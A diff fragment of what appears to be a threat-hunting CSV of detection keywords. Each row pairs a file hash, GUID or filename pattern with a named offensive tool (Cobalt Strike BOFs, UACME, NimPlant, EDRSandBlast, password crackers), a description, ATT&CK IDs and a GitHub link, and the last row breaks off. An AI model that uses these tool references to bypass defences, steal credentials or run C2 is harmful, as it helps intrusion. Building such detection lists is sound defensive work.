"*713724C3-2367-49FA-B03F-AB4B336FB405*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" -"*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*73948912-CEBD-48ED-85E2-85FCD1D4F560*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*7443/new/payloads*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*73948912-CEBD-48ED-85E2-85FCD1D4F560*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7443/new/payloads*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*76FFA92B-429B-4865-970D-4E7678AC34EA*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*79F54747-048D-4FD6-AEF4-7B098F923FD8*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*7CFC52.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7CFC52CD3F.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*7E47D586-DDC6-4382-848C-5CF0798084E1*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*7z2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*81E60DC6-694E-4F51-88FA-6F481B9A4208*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" -"*82277B35-D159-4B44-8D54-FB66EDD58D5C*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7z2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*81E60DC6-694E-4F51-88FA-6F481B9A4208*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*82277B35-D159-4B44-8D54-FB66EDD58D5C*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*83035080-7788-4EA3-82EE-6C06D2E6891F*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" -"*866e5289337ab033f89bc57c5274c7ca*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" -"*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*866e5289337ab033f89bc57c5274c7ca*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*87904247-C363-4F12-A13A-3DA484913F9E*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*879A49C7-0493-4235-85F6-EBF962613A76*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - 